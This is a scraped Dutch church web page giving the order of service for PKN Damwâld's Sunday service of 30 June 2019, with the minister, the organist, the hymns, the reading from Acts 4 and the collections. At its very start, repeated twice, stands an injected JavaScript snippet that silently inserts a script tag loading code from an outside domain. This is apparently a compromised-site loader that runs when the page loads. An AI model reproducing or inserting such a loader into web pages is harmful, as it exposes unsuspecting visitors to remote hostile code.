;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Kerkdienst zondag 30 juni 2019 14:00 uur - PKN Damwâld
zondag 30 juni 2019
14:00 uur

Kerkdienst zondag 30 juni 2019 14:00 uur

Informatie

Voorganger:Ds. G.J. Otter
Organist:Jelte Cuperus
Liturgie
Lied voor de dienst Psalm 121 : 1 en 2
Welkom
We zingen: Gezang 257 : 1
Stil Gebed, Votum en Groet
We zingen: Psalm 67 : 1 en 2
Geloofsbelijdenis
We zingen: Elb 364 : 1, 2 en 3
Gebed
We lezen: Handelingen 4 : 1 - 22
We zingen: Gezang 95 : 1 en 3
Preek .
We zingen: Psalm 118 : 2 en 8
Dankzegging en voorbede
Collecte
We zingen: Elb 226 : 1 en 2
Zegen
Liturgie met de liedteksten is alleen beschikbaar met een Mijn Kerk account. Inloggen
Locatie: Bonifatiuskerk Foarwei 2, Damwâld
Dienst terugluisteren Dienst terugluisteren
Collecte informatie
Eerste collecte: Kerk
Tweede collecte: Kerk
Uitganscollecte: Kerk